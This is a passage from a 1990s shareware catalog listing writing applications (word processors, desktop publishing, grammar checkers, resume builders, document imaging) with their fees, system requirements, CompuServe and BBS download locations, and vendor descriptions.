generation is + desired then MS Help Compiler needed. + Registration fee: $49.95 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $6.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 3 months of unlimited CompuServe, mail support; + 1-month return policy; royalty-free runtime license; bonus + utilities; bonus data; discounts on upgrades. + Look for: availability unknown on BBSs; WHIZNT.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 71303,20 for + assistance). + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + Now works on Win95 too! Powerful text organizer/help generator + for Windows to manage free-format information. Begin using + WhizNotes and never lose track of your ideas & notes. Use long + descriptive names for your notes, group them into folders, + easily retrieve and view them, search through them for + information, insert hypertext jumps, etc. Also, if you have the + Microsoft Help Compiler, you are only a mouse-click away from + turning your notes into the exciting WinHelp format! + + + 3.4 Word processors + + See also: Writing applications, Text editors. + + Product: Bookbild/DOS Pamphlet Publisher [***] + Converts doc. file to camera-ready booklet. See full + description on page 209. + + Chapter 3, "Writing applications" 184 + + + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 175. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 176. + + Product: Easy Word + Author: Easy Software (John Turnbull), +44(0)1625-614669 + Version: 10 (10-01-95) + Needs: IBM AT (80286), DOS 5.0 or better. 640k RAM; Hard disk. + Registration fee: $25.00 + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs; EW.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 2 (or contact userID 100410,717 for + assistance). + SWREG#: 3047 + PsL#: 11490 + Download size: 751k (about 56 minutes with a 2400 baud modem) + Description: + Probably the easiest word processor to learn. Facilities + include line drawing, table entry mode and macros. Will batch + print odd and even pages separately for double sided printing. + Secure erase facility for classified documents and built-in + backup system. + + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 189. + + Product: Hebrew Edit + Author: Right to Left Software, 416-489-7440 + Version: 1.2b (02-14-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $19.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; 2-month return policy; + + Chapter 3, "Writing applications" 185 + + + + bonus templates; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. + Look for: availability unknown on BBSs; HEBED.ZIP on CompuServe + in CIS:FLEFO forum LIBrary 14 (or contact userID 71542,3631 for + assistance). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + Hebrew text editor that supports the Hebrew vowels (Nikud). Has + bilingual menus, clear bright screen fonts. Prints beautiful + large letters in block or script fonts, on all major printers + (LaserJet, DeskJet, Dot matrix). Practice your Hebrew with the + sample files that are included. + + + Product: The Letterhead Kit-32/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 211. + + Product: The Letterhead Kit/DOS [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 212. + + Product: The Letterhead Kit/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 213. + + Product: My Life + Diary and Journal for young & old alike. See full description + on page 557. + + Product: QENV + Quick envelope addressor & letter writer. See full description + on page 83. + + Product: Technical Editor (OS/2) + 32-bit programmers editor for OS/2 2.x. See full description + on page 180. + + Product: Word Fugue + Author: Fugue Software (David Noakes), +61-7-3824-2843 + Version: 3.1 R1 (11-27-95) + Needs: IBM PC, DOS 3.0 or better. 400k RAM; Dual 720k floppy + drives; Hard disk. + Registration fee: $55.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; bonus utilities; all ASP- + + Chapter 3, "Writing applications" 186 + + + + wide offers (see page 6). 2-month free upgrading allowed. + Writing style guide with sample documents. + Look for: availability unknown on BBSs; WF310*.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 3 (multiple files) (or contact + userID 100036,311 for assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Industrial strength word processor. Multiple file editing (up + to 8 windows & copy text between), pull down menus, autosave, + macros, context sensitive help, tables & columns (with + independent wrap), newspaper (snaking) columns, automatic + footnotes and endnotes, generation of table of contents & + indexes, spell checker, supports many printers (also lasers & + postscript), comprehensive mail merge (including IF ELSE). + Built in calculator (also available during printing), revision + marking and more + + + Product: Writer's Cramp + Author: JRE Enterprises + Version: 2.2 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $9.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WRCR22.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WRCR22.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 2475 + Download size: 1223k (about 91 minutes with a 2400 baud modem) + Description: + An inexpensive and simple word processor with many of the + features found in major word processors. Uses a database to + store its letters. Multiple letter databases can be created, + one for each member of the family. Each letter database can be + password protected. + + Chapter 3, "Writing applications" 187 + + + + 3.5 Desktop publishing + + Product: AdMaker + Author: OsoSoft (George Campbell), 805-528-1759 + Version: 3.5 (05-06-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $30.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: ADMAKER.ZIP on BBSs (call 805-528-3753 to download it + at no charge); ADMAKE.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Lets you design display ads up to 7.5" X 9.5" in Windows. Use + TT/ATM fonts; BMP/PCX clip art; line drawing tools. Print 100% + or 200% size layouts. Rotate text; click to position text; + insert special characters; filled boxes; text can overwrite + graphics; WYSIWYG display; right-click help; much, much more. + Use to create ads for your business or for others. Fast, easy, + and accurate! Use for any simple display ad. Much faster than + using Corel. + + + Product: Bookbild/DOS Pamphlet Publisher [***] + Converts doc. file to camera-ready booklet. See full + description on page 209. + + Product: Bookbild/Win Pamphlet Publisher [***] + Builds single-fold brochures in WPWIN 5.2. See full + description on page 209. + + Chapter 3, "Writing applications" 188 + + + + Product: Crossword Clipper for DOS + Author: PC HELP-LINE, 909-797-3091 + Version: 2.00 (04-15-94) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. Crossword Creator for puzzle design. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; discounts on other products. + 3-month free upgrading allowed. + Look for: CLPD20.ZIP on BBSs; CWCLPD.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 8 (or contact userID 72357,3523 for + assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + This crossword layout tool creates .PCX graphic files, suitable + for importing into word-processors or graphics applications. + WYSIWYG display lets you resize the puzzle grid, select fonts, + etc. Also creates ASCII text files containing puzzle clues. + Cannot be used for puzzle design, but will accept crossword + data files (.XWP format only) from other programs. + + + Product: Crossword Clipper for Windows + Author: PC HELP-LINE, 909-797-3091 + Version: 2.00 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. Crossword Creator for + puzzle design. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support. 1-month return policy. 3-month free upgrading allowed. + Look for: CLIP20.ZIP on BBSs; CWCLIP.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 8 (or contact userID 72357,3523 for + assistance). + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + This crossword layout tool works with the Windows Clipboard, + enabling you to paste your puzzles into any Windows + application. WYSIWYG display lets you resize the puzzle grid, + select fonts, etc. Also creates Windows bitmap (.BMP) graphic + files. Cannot be used for puzzle design, but will accept + crossword data files (.XWP format only) from other programs. + + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 447. + + Chapter 3, "Writing applications" 189 + + + + Product: DeltaCad + CAD program. See full description on page 493. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 481. + + Product: EnVision Publisher + Author: Software Vision Corporation, 813-545-4354 + Version: 1.0 (09-01-92) + Needs: IBM PC, DOS 2.0 or better. CGA or Hercules monitor. + Strongly recommended: mouse, hard disk. + Registration fee: $69.00 + Registration benefits: Printed manual, master disks, bonus + clipart libraries & scalable fonts, newsletter support, upgrade + discounts. + Look for: EVP100*.ZIP on BBSs (multiple files) (call 813-585-7082 + to download it at no charge); EVP1*.EXE on CompuServe in + CIS:PCAPP forum LIBrary 6 (multiple files) (or contact userID + 70304,64 for assistance); EVP1*.EXE on GEnie in IBMPC forum + LIBrary 0. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1993 winner, Shareware Industry + Awards. + Description: + A full-feature WYSIWYG desktop publishing program. It has a + mouse-driven Graphical User Interface and it can be used with + or without a mouse. Detailed context-sensitive help. Lets you + create publications directly on the screen, and then print them + on any printer. Provides scalable fonts that can be rotated and + filled with any fill pattern. You can import PCX images, and + draw lines, boxes, polylines, polygons, ellipses and Bezier + curves. + + Chapter 3, "Writing applications" 190 + + + + Product: FontBook Professional + Author: The C Group, Inc. (Mark Cohen), 718-251-1891 + Version: 2.7 (06-13-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse; XMS memory. + Strongly recommended: math coprocessor. + Registration fee: $15.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: FONTBK27.ZIP on BBSs (call 718-241-0225 to download it + at no charge); FONTBK.ZIP on CompuServe in CIS:DTP forum + LIBrary 6 (or contact userID 76670,2602 for assistance). + SWREG#: 1991 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Lets you select some or all of your fonts and display them on + the screen or print speciman sheets showing different types, + styles and point sizes. Additionally, it will print and + display symbol sets for each font indicating the 4 digit ansi + code needed for display in other programs. It will also print + Type Rulers for selected fonts. A definite must for the DTP + professional. Optimized to run concurrently with other DTP + software. + + + Product: Graphcat/DOS Clip Art Cataloger [***] + ClipArt cataloger for WordPerfect 6.x/5.1/DOS. See full + description on page 210. + + Product: Graphcat/Win Clip Art Cataloger [***] + Graphcat clip art cataloger for WPWin7/61/52. See full + description on page 211. + + Product: Hubble + Hubble 2.21 image + doc edit & processing. See full + description on page 489. + + Product: The Letterhead Kit-32/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 211. + + Product: The Letterhead Kit/DOS [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 212. + + Product: The Letterhead Kit/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 213. + + Chapter 3, "Writing applications" 191 + + + + Product: MultiLabel + Author: OsoSoft (George Campbell), 805-528-1759 + Version: 3.5 (04-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; XMS memory; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; lifetime return policy; bonus + graphics; all ASP-wide offers (see page 6); discounts on + upgrades. Lifetime free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLTLBL.ZIP on BBSs (call 805-528-3753 to download it at + no charge); MLTLBL.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + This popular Windows label designer creates and prints labels + on all Avery laser label stock or create custom sizes. Name + tags, postcards, and more, too. Use all Windows fonts, BMP/PCX + clip art and line drawing tools. Serial numbers, address book, + and more. Supports all Windows printers, including color. + Rotate text. Print sheets of same labels or merge labels from + address book. Best of its class. + + + Product: PageFocus + A productivity program for everyday use. See full description + on page 483. + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 87. + + Product: Rockford! + Author: OsoSoft (George Campbell), 805-528-1759 + Version: 3.5 (05-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited fax, BBS, + CompuServe, mail support; lifetime return policy; bonus + graphics; all ASP-wide offers (see page 6); discounts on + upgrades. Lifetime free upgrading allowed. + Look for: ROCKFORD.ZIP on BBSs (call 805-528-3753 to download it + at no charge); RCKFRD.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Designs business cards in Windows. Use TT/ATM fonts; BMP/PCX + clip art; line drawing tools. Print on pre-scored stock from + Paper Direct and others or print 200% or 4-up camera-ready + layouts. Rotate text; insert foreign characters; right-click + + Chapter 3, "Writing applications" 192 + + + + help; overlay text on graphics; vertical or horizontal card + formats; color printer support; much, much more. Design + professional business cards for yourself or to earn money. + Create sheets of cards in minutes! + + + Product: Rubicon Publisher + Author: Rubicon Computer Labs Inc., 819-770-4317 + Version: 2.2C (06-08-91) + Needs: IBM PC, DOS 2.1 or better. Hard disk. VGA monitor + recommended. + Registration fee: $59.50 + Registration benefits: Printed manual, bonus fonts, third-party + font support, bonus features. + Look for: availability unknown on BBSs. + Download size: 337k (about 25 minutes with a 2400 baud modem) + Description: + Comprehensive desktop publisher based on traditional + typesetting concepts; over 120 features. Supports over 200 + printers including most popular 9 & 24 pin dot matrix, LaserJet + 2 & 3, & Postscript. Comes with 2 font families; supports + LaserJet 3 & Postscript fonts. Batch processor, controlled by + tags embedded in the input file. User's present word processor + or text editor can be used to prepare (Ascii) files for + publication. Screen preview provided for computers with VGA. + Great quality output! + + + Product: SmartDraw + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + Product: SmartDraw 95 + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 291. + + + 3.6 Spelling checkers + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 363. + + Product: Word Fugue + Industrial strength word processing. See full description on + page 185. + + Chapter 3, "Writing applications" 193 + + + + 3.7 Style checkers + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 200. + + Product: Cliche Finder + Author: R.K. West Consulting (Rosemary K. West) + Version: 2.0 (05-10-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CLICH20.ZIP on BBSs; CLICHE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 141k (about eleven minutes with a 2400 baud modem) + Description: + Checks for the presence of cliches and overused phrases. Cliche + list can be edited by user. Generates a report. + + + Product: PC-Proof + Author: Intellect Systems, 206-226-0429 + Version: 2.0A (10-18-93) + Needs: IBM PC, DOS 3.1 or better. Hard disk. Mouse recommended. + Registration fee: $40.00 + Registration benefits: Printed manual, master disks, phone + support. + Look for: availability unknown on BBSs; PC-PRO.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72630,3457 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + A commerial quality grammar checking program that can detect + many complex and embarrassing grammar errors. These errors + include dropped words, extra words or words which may have been + misspelled into another word. Can also detect many many other + mistakes including subject/verb agreement, and passive voice. + Compatible with WordPerfect, Word, Works, WinWord, ProWrite, + PC-Write, WordStar and others. Full mouse support. + + Chapter 3, "Writing applications" 194 + + + + Product: WinProof + Author: Intellect Systems, 206-226-0429 + Version: 1.0C (01-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $45.00 + Registration benefits: Printed manual, master disks, phone + support. + Look for: availability unknown on BBSs; WINPRO.EXE on CompuServe + in CIS:PCAPP forum LIBrary 2 (or contact userID 72630,3457 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A professional grammar checker for Windows that can detect many + complex and embarrassing errors like dropped words, extra words + or words that have been misspelled into another word. Can also + detect may other mistakes including subject/verb agreement, + misused articles and passive voice. Not another feeble style or + readability checker. It knows English! Compatible with all + major word processors and can check the clipboard. + + + 3.8 Bibliography + + See also: Education. + + Product: BIBLOGIC + Author: Biblogic Computer Services (Steve Champion) + Version: 3.02 (12-19-93) + Needs: IBM PC, DOS 2.1 or better. 640k RAM. + Strongly recommended: Hard disk. + Registration fee: $47.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs; BIBLOG.ZIP on CompuServe + in CIS:EDFORUM forum LIBrary 2 (or contact userID 75020,556 for + assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A research and writing tool to store, retrieve, and print + bibliographic information and associated remarks. Handles many + different reference styles and organizes notes as well as + references. Works with most word-processors. + + + Product: REFILE + Document management software. See full description on + page 446. + + Chapter 3, "Writing applications" 195 + + + + 3.9 Document boilerplates + + 3.9.1 Resume' + + Product: Resume Master Deluxe + Author: Whirlwind Technologies (James S Nixon) + Version: 4.0 (02-01-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Hard disk. + Registration fee: $20.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; discounts on upgrades. + Look for: availability unknown on BBSs; RMD40.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 71742,3632 for + assistance). + SWREG#: 1938 + PsL#: 11143 + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + A powerful resume generating tool that will give you the + winning edge needed in today's job market. Easy-to-use & menu + driven. Prompts you to enter information about yourself, past + work history, education, etc. This information is then + formatted & printed to create a professional-looking customized + one-page resume. Creates choice of chronological or targeted + resume. Supports any printer. Online help system & on-disk + user's manual. Print resume to file for customization. + + + Product: The Right Resume + Author: Whirlwind Technologies (James S Nixon) + Version: 1.0c (05-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited CompuServe, mail + support; bonus utilities; bonus data; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs; TRR_1C.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 20 (or contact userID 71742,3632 + for assistance). + SWREG#: 4388 + PsL#: 11756 + Download size: 1131k (about 84 minutes with a 2400 baud modem) + Description: + Powerful Windows-based job hunting package. Features include: + Create choice of chronological, functional, or targeted resume; + Fully-functional WYSIWYG word processer for creating cover + letters, customizing your resume, etc.; Generate multiple + resumes from one data source without having to retype; Modify + + Chapter 3, "Writing applications" 196 + + + + feature to easily reorganize or delete data; On-disk user's + manual and on-line help system. + + + 3.10 Document control & management + + Product: Docudex Document Imaging + Author: Informatik Inc., 610.640.0339 + Version: 1.50 (12-10-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $59.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; DOCUDX.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 76534,1166 + for assistance). + SWREG#: 8275 + Download size: 915k (about 68 minutes with a 2400 baud modem) + Description: + Comprehensive document imaging system for business and personal + use. Industry-standard formats and compression. TIFF, DCX, + GIF, JPEG, WMF, and many other formats. Multiple pages. + Database with five floating keyword fields, drawer, folder, + date and description fields. Powerful and easy to use query + method. This is a simplified version of the Docuthek Document + Imaging System. + + + Product: Docuthek Document Imaging + Author: Informatik Inc., 610.640.0339 + Version: 1.50 (12-10-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $59.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; DOCUTK.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 76534,1166 + for assistance). + SWREG#: 6520 + Download size: 964k (about 72 minutes with a 2400 baud modem) + Description: + Comprehensive document imaging system for business and personal + use. Industry-standard formats and compression. TIFF, DCX, + GIF, JPEG, WMF, and many other formats. Multiple pages. + + Chapter 3, "Writing applications" 197 + + + + Popular relational database engine. Easy-to-use, intuitive, + yet powerful SQL-based query method. Scan documents with fax + machine or scanner. + + + Product: E-report + Paperless management reports, COLD. See full description on + page 47. + + Product: MegaWord + More than 30 add-in apps for WinWord 6.0. See full description + on page 205. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 363. + + Product: REFILE + Document management software. See full description on + page 446. + + Product: TIFFmaker + Converts text to TIFF files. See full description on page 509. + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 183. + + + 3.11 Creativity & brainstorming + + See also: Business, Training & support aids, Lecturing & slide + shows. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 182. + + Chapter 3, "Writing applications" 198 + + + + Product: Creativity Package + Author: R.K. West Consulting (Rosemary K. West) + Version: 4.01 (01-04-96) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on other products; discounts on upgrades. + Look for: CREAT401.ZIP on BBSs; CREATE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10195 + Download size: 460k (about 34 minutes with a 2400 baud modem) + Description: + 3-part program for writers, teachers, students, executives - + anyone who must produce fresh ideas. Includes a complete book- + on-disk on creativity enhancement, software for computer-aided + brainstorming, and a poetry writing program. + + + Product: Curses! + Creative insult generator. See full description on page 604. + + Product: OMNIDay For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 3.00 (03-29-95) + Needs: IBM PC, DOS 3.1 or better. 330k RAM; CGA monitor; + Hercules monitor. + Strongly recommended: Dual 720k floppy drives; Hard disk; HP + LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ODAYW300.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY4W.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 1715 + Download size: 334k (about 25 minutes with a 2400 baud modem) + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 99 pages of 2K each. User can + + Chapter 3, "Writing applications" 199 + + + + update and delete entries. Will print out opus for selected + dates or all. Full featured text editor with on line help. + Import feature for those who travel. Includes diary keeping + tips. + + + Product: On This Day + "What happened on this day in history?" See full description + on page 470. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 470. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 439. + + Product: Poetry Generator + Author: R.K. West Consulting (Rosemary K. West) + Version: 2.5 (01-01-96) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $19.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; discounts on upgrades. + Look for: POET25.ZIP on BBSs; POETRY.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + SWREG#: 9177 + Download size: 515k (about 38 minutes with a 2400 baud modem) + Description: + Turn your computer into a poet! Using a 20,000-word vocabulary, + this program creates free-verse poems at the touch of a button. + Using the structure of actual poems as models, the program + randomly combines words and short phrases into verses 4 to 9 + lines long. The results as fascinating. Some of these poems + have actually been published in national magazines. This + program has been featured in the Los Angeles Times, Scientific + American, and Writer's Digest. + + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 441. + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 183. + + Chapter 3, "Writing applications" 200 + + + + 3.12 Writing utilities + + Product: Bookbild/DOS Pamphlet Publisher [***] + Converts doc. file to camera-ready booklet. See full + description on page 209. + + Product: Bookbild/Win Pamphlet Publisher [***] + Builds single-fold brochures in WPWIN 5.2. See full + description on page 209. + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 175. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 176. + + Product: BUDDY: A Tutorial Companion + Author: Chatfield Software, Inc. (Hale Chatfield), 216-632-5447 + Version: 1.2 (08-05-92) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives. + Registration fee: $19.50 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited + tollfree 800# phone, fax, CompuServe, GEnie, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: CSBDY.ZIP on BBSs; CSBDY.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 0 (or contact userID 71031,1036 for + assistance); CSBDY.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 132k (about ten minutes with a 2400 baud modem) + Description: + Are you already pretty good with your word processor? Now in + just eight lessons you can (a) write more effectively and (b) + avoid some embarrassing mistakes. Also lets you enjoy wacky + banter with your PC - as "comic relief" to the very serious + business of clear and strategic writing. Written in the AI + language INRAC, which means that you can conduct typed + conversations with the program in standard English. Contains a + special "common error detector." + + + Product: Cliche Finder + Checks writing cliches. See full description on page 193. + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 314. + + Chapter 3, "Writing applications" 201 + + + + Product: The Letterhead Kit-32/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 211. + + Product: The Letterhead Kit/DOS [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 212. + + Product: The Letterhead Kit/Win [***] + Retrieves custom letterheads, graphics, bills. See full + description on page 213. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 193. + + Product: WinProof + Windows grammar checker. See full description on page 193. + + 3.12.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: MARGARINE + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 3.21 (03-22-95) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full 